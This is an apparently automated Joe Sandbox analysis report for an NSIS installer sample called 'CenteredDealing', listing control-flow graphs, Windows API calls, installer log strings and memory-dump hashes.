                                                                                                                                                                                                                                                                control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2740478559-0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(007F0D08), ref: 00402387
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                • String ID: Exch: stack < %d elements$Pop: stack empty$TemperatureHighHunterTrash
                                                                                                                                                                                                                                                                • API String ID: 1459762280-3615923275

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(007F0D08), ref: 00402387
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3376005127-0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2568930968-0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                • String ID: <RM>$TemperatureHighHunterTrash$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                • API String ID: 247603264-4140014528
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                • String ID: nsa
                                                                                                                                                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: HideWindow
                                                                                                                                                                                                                                                                • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3394109436-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
